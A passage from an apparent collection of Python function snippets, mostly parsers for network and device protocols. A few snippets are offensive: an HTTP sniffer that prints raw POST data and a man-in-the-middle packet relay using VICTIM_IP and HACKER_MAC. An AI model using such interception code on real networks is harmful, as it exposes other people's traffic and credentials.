mac])\n\t\tfields.append(['Security enabled', packet.securityEnabled, mac])\n\t\tfields.append(['Frame pending', packet.framePending, mac])\n\t\tfields.append(['Ack. request', packet.ackRequest, mac])\n\t\tfields.append(['Intra-PAN', packet.intraPAN, mac])\n\t\tfields.append(['Dest. addressing mode', packet.dstAddrMode, mac])\n\t\tfields.append(['Source addressing mode', packet.srcAddrMode, mac])\n\t\tfields.append(['Sequence number', packet.seqNumber, mac])\n\t\t\n\t\tif hasattr(packet, 'dstPANID'):\n\t\t\tfields.append(['Destination PAN-ID', packet.dstPANID, mac])\n\t\t\n\t\tif hasattr(packet, 'dstAddr'):\n\t\t\tfields.append(['Destination address', packet.dstAddr, mac])\n\t\t\n\t\tif hasattr(packet, 'srcPANID'):\n\t\t\tfields.append(['Source PAN-ID', packet.srcPANID, mac])\n\t\t\t\n\t\tif hasattr(packet, 'srcAddr'):\n\t\t\tfields.append(['Source address', packet.srcAddr, mac])\n\t\t\t\n\t\tif hasattr(packet, 'payload'):\n\t\t\tfields.append(['Payload', packet.payload, mac])\n\t\t\n\t\tif hasattr(packet, 'commandType'):\n\t\t\tfields.append(['Command type', packet.commandType, mac])\n\t\t\n\t\tif hasattr(packet, 'commandPayload'):\n\t\t\tfields.append(['Command payload', packet.commandPayload, mac])\n\t\t\n\t\tif hasattr(packet, 'superFrameSpec'):\n\t\t\tfields.append(['Superframe specification', packet.superFrameSpec, mac])\n\t\t\tsfs = len(fields) - 1\n\t\t\tfields.append(['Beacon order', packet.beaconOrder, sfs])\n\t\t\tfields.append(['Superframe order', packet.superFrameOrder, sfs])\n\t\t\tfields.append(['finalCAPSlot', packet.finalCAPSlot, sfs])\n\t\t\tfields.append(['Batt. life extension', packet.battLifeExt, sfs])\n\t\t\tfields.append(['PAN Coordinator', packet.PANCoord, sfs])\n\t\t\tfields.append(['Association permit', packet.assocPermit, sfs])\n\t\t\n\t\tif hasattr(packet, 'GTS'):\n\t\t\tfields.append(['GTS specification', packet.GTS, mac])\n\t\t\tgts = len(fields) - 1\n\t\t\tfields.append(['GTS descriptor count', packet.GTSDescrCount, gts])\n\t\t\tfields.append(['GTS permit', packet.GTSPermit, gts])\n\t\t\tif int(packet.GTSDescrCount, 16) > 0:\n\t\t\t\tfields.append(['GTS directions', packet.GTSDirections, gts])\n\t\t\t\tfields.append(['GTS descriptors list', '', gts])\n\t\t\t\tdscList = len(fields) - 1\n\t\t\t\tfor i in xrange(int(packet.GTSDescrCount, 16)):\n\t\t\t\t\tfields.append(['Descriptor #'+str(i), '', dscList])\n\t\t\t\t\td = len(fields) - 1\n\t\t\t\t\tfields.append(['Device short address', packet.GTSDescriptors[i].deviceShortAddr, d])\n\t\t\t\t\tfields.append(['GTS starting slot', packet.GTSDescriptors[i].GTSStartingSlot, d])\n\t\t\t\t\tfields.append(['GTS length', packet.GTSDescriptors[i].GTSLength, d])\n\t\t\t\n\t\t\tfields.append(['Pending addresses list', '', gts])\n\t\t\tpnd = len(fields) - 1\n\t\t\tif int(packet.numShortAddrPnd, 16) > 0 or int(packet.numShortAddrPnd, 16) > 0:\n\t\t\t\tfor i in xrange(int(self.numShortAddrPnd, 16)):\n\t\t\t\t\tfields.append(['Short addr. #%i' % i, packet.shortAddrPndList[i], pnd])\n\n\t\t\t\tfor i in xrange(int(self.numLongAddrPnd, 16)):\n\t\t\t\t\tfields.append(['Long addr. #%i' % i, packet.longAddrPndList[i], pnd])\n\t\t\n\t\tif hasattr(packet, 'bcnPayload'):\n\t\t\tfields.append(['Beacon payload', packet.bcnPayload, mac])\n\t\t\n\t\tself.beginInsertRows(QModelIndex(), 0, len(self.fields)+1)\n\t\tself.endInsertRows()\n\t\tfor field in fields:\n\t\t\tprint field", "def parse(data: bytes, port: int, origin: helpers.ConnectionType):\n # Ignore packets from master server... game server is more interesting\n if port == helpers.MASTER_PORT:\n return\n # Iteratively parse packet data until nothing is left to parse\n reads = 0\n while len(data) >= 2:\n reads += 1\n pid = data[:2]\n handler = PACKET_HANDLERS.get(pid, None)\n if handler:\n # Parse data without packet id prepended\n # Returned data will be parsed next iteration\n data = handler(data[2:], origin=origin)\n else:\n # This packet doesn't have a handler\n # Print it once for inspection\n if reads <= 1:\n print(f'[{pid}] - {data}\\n')\n # Remove the first byte and try parsing again later\n data = data[1:]", "def get_payload(packet):\n #payload_len = get_payload_length(packet)\n adaptation_field_len = TS.get_adaptation_field_length(packet)\n header_size = 4 + adaptation_field_len\n return packet[header_size:]", "def __getHeaderInfo(self, decoded_data):\n\t\tip = decoded_data.child()\n\t\ttcp = ip.child()\n\t\t#src = (ip.get_ip_src(), tcp.get_th_sport())\n\t\ttry:\tsrc = ip.get_ip_src()\n\t\texcept:\tsrc = '?'\n\t\t#dst = (ip.get_ip_dst(), tcp.get_th_dport())\n\t\ttry:\tdst = ip.get_ip_dst()\n\t\texcept:\tdst = '?'\n\t\t#data = tcp.get_data_as_string()\n\t\tdata = tcp.get_packet()\n\t\treturn (src, dst, data)", "def handle_pkt_header(pkt, packets, index):\r\n dest_mac = pkt[0:12]\r\n str_dest_mac = dest_mac[0:2]\r\n for i in range(2, len(dest_mac), 2):\r\n str_dest_mac += \":\" + dest_mac[i:i+2]\r\n packets[index][0].append(str_dest_mac)\r\n src_mac = pkt[12:24]\r\n str_src_mac = pkt[0:2]\r\n for i in range(2, len(src_mac), 2):\r\n str_src_mac += \":\" + src_mac[i:i+2]\r\n packets[index][0].append(str_src_mac)\r\n etherType = pkt[24:28]\r\n packets[index][0].append(etherType)\r\n\r\n return packets", "def packet_from_xml_packet(xml_pkt, psml_structure=None):\n if not isinstance(xml_pkt, lxml.objectify.ObjectifiedElement):\n parser = lxml.objectify.makeparser(huge_tree=True, recover=True)\n try:\n xml_pkt = lxml.objectify.fromstring(xml_pkt, parser)\n except lxml.etree.XMLSyntaxError:\n res = re.findall(r'<field name=\"num\" pos=\"0\" show=\"(.*?)\"', xml_pkt.decode(), re.S)[0]\n print(f'Packet conversion error from xml to python object for packet number {res}.')\n return\n if psml_structure:\n return _packet_from_psml_packet(xml_pkt, psml_structure)\n return _packet_object_from_xml(xml_pkt)", "def decode(self, msg):\n if len(msg) < 2:\n raise ValueError(\"Message is too short - can't fit a preamble\")\n preamble = msg[:2]\n \n (x,) = struct.unpack(\"<H\", preamble)\n \n ID = (x & self.ID_MASK) >> 4\n LEN = x & self.LEN_MASK\n\n if LEN < 0 or LEN > 8:\n raise ValueError(\"Invalid CAN payload length - %d bytes not in [0,8] bytes\" % LEN)\n\n if LEN != len(msg[2:]):\n raise ValueError(\"Length from preamble %d mismatches actual length %d in packet w/id %#x\" %\n (LEN, len(msg[2:]), ID))\n\n TIME = datetime.datetime.utcnow()\n \n if ID in self.descriptors:\n desc = self.descriptors[ID]\n if \"format\" not in desc:\n raise ValueError(\"No format specified for %#x:%s\" % (ID, desc[\"name\"]))\n if LEN != struct.calcsize(\"<\" + str(desc[\"format\"])):\n raise ValueError(\"Error in decoding message id=%#x name=%s - length field %d mismatches descriptor %d\"\n % (ID, desc[\"name\"], LEN, struct.calcsize(\"<\" + str(desc[\"format\"]))))\n\n DATA = struct.unpack(\"<\" + str(desc[\"format\"]), msg[2:2+LEN])\n \n return (TIME, ID, desc, DATA)\n else:\n raise ValueError(\"Unknown message id=%#x, len=%d, data=%r\" % (ID, LEN, msg[2:]))", "def handle_udp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n length = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(length)\r\n packets[i][2].append(checksum_value)\r\n\r\n return packets", "def __init__(self, pcap):\n self.pcap = pcap\n self.actions = []\n self._parse_pcap()", "def handle_tcp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n sequence_num = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n acknowledgment = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n data_offset = int(pkt[start_point], 16) * 4\r\n start_point += 2\r\n flags = pkt[start_point:start_point+2]\r\n flags_str = \"\"\r\n for f in flags:\r\n flags_str += str(format(int(f), '04b'))\r\n start_point += 2\r\n window_size = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n start_point += 4\r\n urgent_pointer = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n options = int((2 * packets[i][0][0] - start_point)/2)\r\n\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(sequence_num)\r\n packets[i][2].append(acknowledgment)\r\n packets[i][2].append(data_offset)\r\n packets[i][2].append(flags_str)\r\n packets[i][2].append(window_size)\r\n packets[i][2].append(checksum_value)\r\n packets[i][2].append(urgent_pointer)\r\n packets[i][2].append(options)\r\n return packets", "def parse_mochad_line(self, line):\n # bail out unless it's an incoming RFSEC message\n if line[15:23] == 'Rx RFSEC':\n\n # decode receive RFSEC message. format is either:\n # 09/22 15:39:07 Rx RFSEC Addr: 21:26:80 Func: Contact_alert_min_DS10A\n # ~ or ~\n # 09/22 15:39:07 Rx RFSEC Addr: 0x80 Func: Motion_alert_SP554A\n line_list = line.split(' ')\n addr = line_list[5]\n func = line_list[7]\n\n func_dict = self.decode_func(func)\n\n return addr, {'func': func_dict}, 'security'\n\n# elif line[15:23] == 'Tx RFSEC':\n\n # decode send RFSEC message. format is either:\n # 09/22 15:39:07 Tx RFSEC Addr: 21:26:80 Func: Contact_alert_min_DS10A\n # ~ or ~\n # 09/22 15:39:07 Tx RFSEC Addr: 0x80 Func: Motion_alert_SP554A\n# line_list = line.split(' ')\n# addr = line_list[5]\n# func = line_list[7]\n#\n# func_dict = self.decode_func(func)\n#\n# return addr, {'func': func_dict}, 'trigger'\n\n elif line[15:20] == 'Rx RF':\n\n # decode receive RF message. format is:\n # 02/13 23:54:28 Rx RF HouseUnit: B1 Func: On\n line_list = line.split(' ')\n house_code = line_list[5];\n house_func = line_list[7]\n\n return house_code, {'func': house_func}, 'radio'\n\n elif line[15:20] == 'Rx PL':\n \n # decode receive PL message. format is:\n # 02/13 23:54:28 Rx PL HouseUnit: A1\n # 02/13 23:54:28 Rx PL House: A Func: On\n line_list = line.split(' ')\n if line[21:27] == 'HouseU':\n house_code = line_list[5]\n with open ('/root/.house_code', 'wb') as f:\n pickle.dump(house_code, f)\n else:\n house_func = line_list[7]\n with open ('/root/.house_code', 'rb') as f:\n house_code = pickle.load(f)\n return house_code, {'func': house_func}, 'powerline'\n \n elif line[15:20] == 'Tx PL':\n \n # decode send RF/PL message. format is:\n # 02/13 23:54:28 Tx PL HouseUnit: A1\n # 02/13 23:54:28 Tx PL House: A Func: On\n line_list = line.split(' ')\n if line[21:27] == 'HouseU':\n house_code = line_list[5]\n with open ('/root/.house_code', 'wb') as f:\n pickle.dump(house_code, f)\n else:\n house_func = line_list[7]\n with open ('/root/.house_code', 'rb') as f:\n house_code = pickle.load(f)\n return house_code, {'func': house_func}, 'button'\n \n return '', ''", "def process(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n if self.sip and self.dip and self.sp and self.dp:\n self.process_pkts(pkts)", "def decode_packet(data):\n\n opcodes = [(\"AUTH_LOGON_CHALLENGE\", \"\\x00\"), (\"AUTH_LOGON_PROOF\", \"\\x01\")]\n opcode = data[0] # Opcode of the received packet (First byte)\n if opcode == opcodes[0][1]: # Auth Logon challenge\n srp_rcvd = {\n 'error': data[1], # (you should hope that it is always 0)\n 'B': data[3:35], # Read B and skip 1 field (Length_g)\n 'g': data[36:37], # Read g and skip 1 field (Length_n)\n 'N': data[38:70],\n 's': data[70:102], # Read salt\n 'crc': data[102:] # (useless for private servers)\n }\n return srp_rcvd\n if opcode == opcodes[1][1]:\n # Auth logon proof\n if data[1] == \"\\x00\": # Code error: 0\n srp_rcvd = {'login': 1}\n else:\n srp_rcvd = {'login': 0}\n return srp_rcvd", "def _parse_udp_packet(self, packet_bytes):\n opcode = packet_bytes[:2]\n if opcode == 5:\n reply = self.error_messages[int.from_bytes(packet_bytes[2:4], 'big')]\n print(reply)\n elif opcode == 4:\n reply = \"ACK\"\n else:\n reply = \"UNK\"\n return reply", "def arp_parse(data):\n\t# Iteratize pkt\n\tpkt = packet.Packet(data)\n\ti = iter(pkt)\n\teth_pkt = next(i)\n\t\t# Ensure it's an ethernet frame.\n\tassert isinstance(eth_pkt, ethernet.ethernet)\n\n\tarp_pkt = next(i)\n\tif not isinstance(arp_pkt, arp.arp):\n\t\traise ARPPacket.ARPUnknownFormat()\n\n\tif arp_pkt.opcode not in (ARP_REQUEST, ARP_REPLY):\n\t\traise ARPPacket.ARPUnknownFormat(\n\t\t\tmsg='unsupported opcode %d' % arp_pkt.opcode)\n\n\tif arp_pkt.proto != ETH_TYPE_IP:\n\t\traise ARPPacket.ARPUnknownFormat(\n\t\t\tmsg='unsupported arp ethtype 0x%04x' % arp_pkt.proto)\n\n\treturn arp_pkt", "def __packetHandler(self, hdr, data):\n\t\tif self.quit: raise SystemExit('capture on interface stoped.')\n\n\t\tdecoded_data = self.decoder.decode(data)\n\t\t(src, dst, data) = self.__getHeaderInfo(decoded_data)\n\t\tfor item in regex_links.finditer(str(data)):\n\t\t\tif not item: continue\n\t\t\t#pos = item.start()\n\t\t\tlink = item.groups()[0]\n\t\t\t#self.buffer.append( (link,) )\n\t\t\tself.buffer.append( (link,src,dst,) )\t# append to internal buffer", "def parse(self, data):\n self._readahead.write(data)\n buf = self._readahead.getvalue()\n if len(buf) < 4:\n return\n while len(buf) >= 4:\n size = int(buf[:4], 16)\n if size == 0:\n self.handle_pkt(None)\n buf = buf[4:]\n elif size <= len(buf):\n self.handle_pkt(buf[4:size])\n buf = buf[size:]\n else:\n break\n self._readahead = BytesIO()\n self._readahead.write(buf)", "def handle_icmp(pkt, packets, i, start_point):\r\n icmp_type = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_code = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_checksum = pkt[start_point:start_point+4]\r\n packets[i][2].append(icmp_type)\r\n packets[i][2].append(icmp_code)\r\n packets[i][2].append(icmp_checksum)\r\n return packets", "def parse_payload(self):\n while len(self.buffer) >= 10:\n \"\"\" check magic word \"\"\"\n if self.buffer[0:2] != self.mw:\n #LogDebug(\"drop all buffer due to incorrect magic word\")\n self.buffer = b\"\" # drop entire buffer\n\n \"\"\" extract the value from length field \"\"\"\n length = struct.unpack(\"I\", self.buffer[2:6])[0] + 1\n #print \"packet len\", length, \"buffer len\", len(self.buffer)\n if len(self.buffer) < length:\n #LogDebug(\"imcompleted packet will be processed later\")\n break\n\n \"\"\" verify the packet CRC \"\"\"\n calculated_crc = struct.pack(\"I\", binascii.crc32(self.buffer[:length-4]) & 0xFFFFFFFF)\n if calculated_crc != self.buffer[length-4:length]:\n pass\n else:\n payload = self.buffer[6:length-4]\n self.payloads.append(payload)\n self.buffer = self.buffer[length:]", "def handle_packet(cls, packet: scapypacket):\n pass", "def decode(self,buf):\n eth = dpkt.ethernet.Ethernet(buf)\n pkt_len = len(buf)\n if(eth.type== dpkt.ethernet.ETH_TYPE_IP):\n ip = eth.data\n dst_ip = socket.inet_ntoa(ip.dst)\n src_ip = socket.inet_ntoa(ip.src)\n octet_list = string.split(dst_ip,'.')\n broadcast = False\n for o in octet_list:\n if (o == \"255\"):\n broadcast = True\n break\n if((octet_list[0] == \"224\") or (octet_list[0] == \"239\")):\n broadcast = True #Its multicast actually.\n if not broadcast:\n if(ip.p == dpkt.ip.IP_PROTO_TCP):\n pass\n elif(ip.p == dpkt.ip.IP_PROTO_UDP):\n udp =ip.data\n if((udp.dport == 53) or (udp.sport == 53)): # A request. \n if(udp.dport == 53): # A request. \n return self.dns_handler.handle_dns_request(ip.src,ip.dst,ip.p,udp.sport,udp.dport,udp.data)\n if(udp.sport == 53): # A DNS response\n self.dns_handler.handle_dns_response(ip.src,ip.dst,ip.p,udp.sport,udp.dport,udp.data)\n else:\n pass", "def spoof_packet(packet):", "def parse_header(line):\n # 2015-09-27 14:55:41 UTC [192.0.2.1]:56721 -> [192.0.2.2]:443 (37):\n m = re.match(r'(\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2} \\S+) \\[(.+?)\\]:(\\d+) -> \\[(.+?)\\]:(\\d+) \\((\\d+|EOF)\\):?', line)\n if not m:\n raise LogSyntaxError(line)\n res = {}\n res['timestamp'] = m.group(1)\n res['src_addr'] = m.group(2)\n res['src_port'] = int(m.group(3))\n res['dst_addr'] = m.group(4)\n res['dst_port'] = int(m.group(5))\n if m.group(6) == 'EOF':\n res['eof'] = True\n else:\n res['eof'] = False\n res['size'] = int(m.group(6))\n return res", "def decode_network_packet(buf):\n off = 0\n blen = len(buf)\n\n while off < blen:\n ptype, plen = header.unpack_from(buf, off)\n\n if plen > blen - off:\n raise ValueError(\"Packet longer than amount of data in buffer\")\n\n if ptype not in _decoders:\n raise ValueError(\"Message type %i not recognized\" % ptype)\n\n yield ptype, _decoders[ptype](ptype, plen, buf[off:])\n off += plen", "def parse_data(self, byte_stream: BytesIO, header: Header) -> Dict[Any, Any]:\n return self.packet_type_to_parser[header.subpacket_id](byte_stream, header)", "def parse_replaydata(self):\n pass", "def sniff_traffic(hs, count, timeout, traffic_type, pkt_type, exp_dst, step):\n iface = hs.ports['eth1']\n step('Scapy capture started')\n if (traffic_type == \"encap\"):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, timeout={}, \"\n \" filter='port 4789 and (!icmp or !ip6)', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, traffic_type, pkt_type, exp_dst, step=step)\n elif (traffic_type == \"decap\"):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, \"\n \" timeout={}, filter='!icmp or !ip6', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, traffic_type, pkt_type, exp_dst, step=step)", "def process_packet(self, in_port, packet):\n \n buf = bytearray(packet)\n for idx in range((len(packet) + 19)/20):\n logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20))\n\n if self.disabled:\n logging.debug(\"Switch is disabled; discarding packet\")\n return\n\n parsed_packet = ParsedPacket(buf, self.metadata)\n logging.debug(\"Processing packet %d from port %d with %s\" % \n (parsed_packet.id, in_port,\n self.first_processor.name))\n self.first_processor.process(parsed_packet)", "def process_packet(packet):\n if packet.haslayer(HTTPRequest):\n # if this packet is an HTTP Request\n # get the requested URL\n url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()\n # get the requester's IP Address\n ip = packet[IP].src\n # get the request method\n method = packet[HTTPRequest].Method.decode()\n print(\"\\n{GREEN}[+] \", ip, \"Requested \", url, \" with \", method)\n if show_raw and packet.haslayer(Raw) and method == \"POST\":\n # if show_raw flag is enabled, has raw data, and the requested method is \"POST\"\n # then show raw\n print(\"\\n{RED}[*] Some useful Raw data: \", packet[Raw].load)", "def parse_aprs (packet):\n\n print (packet)\n if len(packet) == 0:\n return\n\n chan = ''\n # Split into address and information parts.\n # There could be a leading '[n]' with a channel number.\n m = re.search (r'^(\\[.+\\] *)?([^:]+):(.+)$', packet)\n if m:\n chan = m.group(1)\t# Still enclosed in [].\n addrs = m.group(2)\n info = m.group(3)\n #print ('<>'+addrs+'<>'+info+'<>')\n\n if info[0] == '}':\n # Unwrap third party traffic format\n # Preserve any channel.\n if chan:\n parse_aprs (chan + info[1:])\n else:\n parse_aprs (info[1:])\n elif info[0:3] == '{DE':\n # APRS \"user defined data\" format for EAS.\n #print ('Process \"message\" - ' + info)\n process_eas (chan, info[3:])\n else:\n print ('Not APRS \"user defined data\" format - ' + info)\n else:\n print ('Could not split into address & info parts - ' + packet)", "def test():\n with open('univ1_pt8.pcap', 'rb') as f: #univ1_trace/univ1_pt8\n pcap = Reader(f)\n print_packets(pcap)\n # top_flows()\n host_pairs()", "def packet_decoder(packet_type,string):\n dct = json.loads(string)\n if packet_type == HS_Version:\n return HS_Version(dct['version'])\n if packet_type == HS_Options:\n return HS_Options(minport=dct['minport'], maxport=dct['maxport'],\n portusage=dct['portusage'], protocol=dct['protocol'],\n timeout=dct['timeout'], payload=dct['payload'],\n key=dct['key'])\n if packet_type == Data:\n return Data(data=dct['data'], terminate=int(dct['terminate']))\n if packet_type == Management:\n return Management(dct['command'],location=dct['location'])\n if packet_type == Switching:\n return Switching(dct['status'])\n if packet_type == Error:\n return Error()", "def _processPacket(self, packet):\n packet_type = (packet[0] & 0xF0) >> 4\n packet_flags = (packet[0] & 0x0F)\n\n if packet_type == CONNECT:\n self._handleConnect(packet)\n elif packet_type == CONNACK:\n self._handleConnack(packet)\n elif packet_type == PUBLISH:\n self._handlePublish(packet)\n elif packet_type == PUBACK:\n self._handlePuback(packet)\n elif packet_type == PUBREC:\n self._handlePubrec(packet)\n elif packet_type == PUBREL:\n self._handlePubrel(packet)\n elif packet_type == PUBCOMP:\n self._handlePubcomp(packet)\n elif packet_type == SUBSCRIBE:\n self._handleSubscribe(packet)\n elif packet_type == SUBACK:\n self._handleSuback(packet)\n elif packet_type == UNSUBSCRIBE:\n self._handleUnsubscribe(packet)\n elif packet_type == UNSUBACK:\n self._handleUnsuback(packet)\n elif packet_type == PINGREQ:\n self._handlePingreq(packet)\n elif packet_type == PINGRESP:\n self._handlePingresp(packet)\n elif packet_type == DISCONNECT:\n self._handleDisconnect(packet)\n else:\n print(\"ERROR: Invalid Packet Type: %s -- Aborting Connection\" %(packet_type))\n self.transport.abortConnection()", "def packet_handler(pkt):\n if pkt[Ether].type == 0x800:\n if pkt[IP].dst == VICTIM_IP:\n if pkt[Ether].dst == HACKER_MAC:\n print(pkt.summary()) # print spoofed packet\n pkt[Ether].dst = VICTIM_MAC\n PACKET_QUEUE.insert(0, pkt)", "def __udp_preprocess_packet(self, seq):\n return b'06' + seq.to_bytes(4, 'big') \\\n + self.packets_status[seq][\"size\"].to_bytes(2, 'big') \\\n + self.packets_status[seq][\"payload\"]", "def parse(self) :\n self._curname = None\n self._curattributes = None\n \n self.setVersion((ord(self._data[0]), ord(self._data[1])))\n self.setOperationId(unpack(\">H\", self._data[2:4])[0])\n self.setRequestId(unpack(\">I\", self._data[4:8])[0])\n self.position = 8\n endofattributes = self.tagvalues[\"end-of-attributes-tag\"]\n maxdelimiter = self.tagvalues[\"event_notification-attributes-tag\"]\n nulloffset = lambda : 0\n #try :\n if 1:\n tag = ord(self._data[self.position])\n while tag != endofattributes :\n self.position += 1\n name = self.tags[tag]\n if name is not None :\n func = getattr(self, name.replace(\"-\", \"_\"), nulloffset)\n self.position += func()\n if ord(self._data[self.position]) > maxdelimiter :\n self.position -= 1\n continue\n oldtag = tag\n tag = ord(self._data[self.position])\n if tag == oldtag :\n self._curattributes.append([])\n #except IndexError :\n # raise IPPError, \"Unexpected end of IPP message.\"\n \n self.data = self._data[self.position+1:]\n self.parsed = True", "def _decode_pmt(self, pmt: bytes) -> PMT.PMT:\n pmtdk = PMT.PMT()\n try:\n pointer_field = pmt[0]\n pos = 1 + pointer_field\n pmtdk.table_id = pmt[pos]\n b12, pmtdk.prog_num = struct.unpack('>HH', pmt[pos+1:pos+5])\n section_length = b12 & 4095\n pos_crc = pos + 3 + section_length - 4 # - CRC\n b = pmt[pos + 5]\n pmtdk.ver_num = (b & 62) >> 1\n pmtdk.cur_next_ind = b & 1\n pmtdk.sec_num = pmt[pos + 6]\n pmtdk.last_sec_num = pmt[pos + 7]\n pmtdk.pcr_pid = struct.unpack('>H', pmt[pos+8:pos+10])[0] & 8191\n prog_info_length = struct.unpack('>H', pmt[pos + 10:pos + 12])[0] & 4095\n #pos += 12 + prog_info_length # skip descriptor\n pos += 12\n if prog_info_length > 0:\n pmtdk.descriptors = DescriptorParser.decode_descriptors(pmt[pos:pos+prog_info_length])\n pos += prog_info_length\n while pos < pos_crc:\n stream_type, elementary_pid, es_info_length = struct.unpack('>BHH', pmt[pos:pos+5])\n elementary_pid = elementary_pid & 8191\n es_info_length = es_info_length & 4095\n pmtdk.streams.append({'stream_type': stream_type, 'elementary_pid': elementary_pid})\n pos += 5 + es_info_length # skip descriptor\n try:\n pmtdk.crc32 = (struct.unpack('>L', pmt[pos_crc:pos_crc + 4]))[0]\n crc_check = self.crc32mpeg2(pmt[1+pointer_field:pos_crc])\n if pmtdk.crc32 != crc_check:\n pmtdk.crc32_ok = False\n except Exception as err:\n pmtdk.crc32_ok = False\n logging.warning('PMT CRC check error:' + str(err))\n return pmtdk\n except Exception as err:\n logging.warning('PMT parsing error:' + str(err))\n return None", "def parse_from_dref(self, packet):\n\t\tname = packet[9:].strip(b'\\x00').decode('utf-8')\n\t\traw_value = packet[5:9]\n\t\tvalue = struct.unpack('f', raw_value)[0]\n\t\treturn name, value", "def read_pkt_line(self):\n if self._readahead is None:\n read = self.read\n else:\n read = self._readahead.read\n self._readahead = None\n\n try:\n sizestr = read(4)\n if not sizestr:\n raise HangupException()\n size = int(sizestr, 16)\n if size == 0:\n if self.report_activity:\n self.report_activity(4, \"read\")\n return None\n if self.report_activity:\n self.report_activity(size, \"read\")\n pkt_contents = read(size - 4)\n except socket.error as e:\n raise GitProtocolError(e)\n else:\n if len(pkt_contents) + 4 != size:\n raise GitProtocolError(\n \"Length of pkt read %04x does not match length prefix %04x\"\n % (len(pkt_contents) + 4, size)\n )\n return pkt_contents", "def extract_int_data(ether_pkt):\n if ether_pkt.type == IPV4_TYPE:\n ip_pkt = IP(_pkt=ether_pkt.payload)\n logger.debug('IPv4 dst - [%s], src - [%s], proto - [%s]',\n ip_pkt.dst, ip_pkt.src, ip_pkt.proto)\n elif ether_pkt.type == IPV6_TYPE:\n ip_pkt = IPv6(_pkt=ether_pkt.payload)\n logger.debug('IPv6 dst - [%s], src - [%s], nh - [%s]',\n ip_pkt.dst, ip_pkt.src, ip_pkt.nh)\n else:\n logger.warn('Unable to process ether type - [%s]', ether_pkt.type)\n return None\n\n udp_int_pkt = UDP(_pkt=ip_pkt.payload)\n logger.debug('UDP INT sport - [%s], dport - [%s], len - [%s]',\n udp_int_pkt.sport, udp_int_pkt.dport, udp_int_pkt.len)\n int_shim_pkt = IntShim(_pkt=udp_int_pkt.payload)\n logger.debug('INT Shim next_proto - [%s], npt - [%s], length - [%s]',\n int_shim_pkt.next_proto, int_shim_pkt.npt,\n int_shim_pkt.length)\n int_hdr_pkt = IntHeader(_pkt=int_shim_pkt.payload)\n logger.debug('INT Header ver - [%s]', int_hdr_pkt.ver)\n int_meta_1 = IntMeta1(_pkt=int_hdr_pkt.payload)\n logger.debug('INT Meta 1 switch_id - [%s]', int_meta_1.switch_id)\n int_meta_2 = IntMeta2(_pkt=int_meta_1.payload)\n logger.debug('INT Meta 2 switch_id - [%s]', int_meta_2.switch_id)\n source_int_pkt = SourceIntMeta(_pkt=int_meta_2.payload)\n logger.debug('SourceIntMeta switch_id - [%s], orig_mac - [%s]',\n source_int_pkt.switch_id, source_int_pkt.orig_mac)\n\n if int_shim_pkt.next_proto == UDP_PROTO:\n tcp_udp_pkt = UDP(_pkt=source_int_pkt.payload)\n logger.debug('TCP sport - [%s], dport - [%s], len - [%s]',\n tcp_udp_pkt.sport, tcp_udp_pkt.dport, tcp_udp_pkt.len)\n else:\n tcp_udp_pkt = TCP(_pkt=source_int_pkt.payload)\n logger.debug('TCP sport - [%s], dport - [%s]',\n tcp_udp_pkt.sport, tcp_udp_pkt.dport)\n\n orig_mac = source_int_pkt.orig_mac\n\n try:\n out = dict(\n devMac=orig_mac,\n devAddr=ip_pkt.src,\n dstAddr=ip_pkt.dst,\n dstPort=tcp_udp_pkt.dport,\n protocol=int_shim_pkt.next_proto,\n packetLen=len(ether_pkt),\n )\n except Exception as e:\n logger.error('Error extracting header data - %s', e)\n return None\n logger.debug('Extracted header data [%s]', out)\n return out", "def preprocess_capture(data, ip_version=4, transp_layer=\"TCP\"):\n #SEE: https://www.winpcap.org/ntar/draft/PCAP-DumpFileFormat.html\n\n #TODO Implement ipv6, udp and ICMP\n if ip_version == 4:\n pass\n else:\n raise ValueError('IP version must be \"4\"')\n\n if transp_layer == \"TCP\":\n pass\n else:\n raise ValueError('transport layer must be TCP')\n\n try:\n capt = pyshark.FileCapture(data, keep_packets=False, display_filter='tcp')\n except:\n exit(\"Could not open pcap file\")\n\n ip_fields = ['src', 'dst', 'flags_df', 'flags_mf', 'hdr_len', 'len', 'ttl']\n tcp_fields = ['srcport', 'dstport', 'flags_ack', 'flags_fin', 'flags_push',\n 'flags_reset', 'flags_syn', 'flags_urg', 'hdr_len', 'len']\n\n #Temporary list to feed the final DataFrame (Performance)\n tmp = []\n counter = 0\n logging.info(\"Starting packet processing\")\n for pkt in capt:\n filtered = {}\n #First field is a empty string (ignoring)\n if hasattr(pkt, 'ip'):\n for field in ip_fields:\n #Changing field names for disambiguation in columns\n filtered[\"ip_\"+field] = pkt[\"ip\"].get_field(field)\n else:\n continue\n if hasattr(pkt, 'tcp'):\n for field in tcp_fields:\n #Changing field names for disambiguation in columns\n filtered[\"tcp_\"+field] = pkt[\"tcp\"].get_field(field)\n else:\n continue\n tmp.append(filtered)\n counter += 1\n if counter % 1000 == 0:\n logging.info(\"Processed %d packets\", counter)\n logging.info(\"Ended packet processing\")\n logging.info(\"Converting list to DataFrame\")\n X = 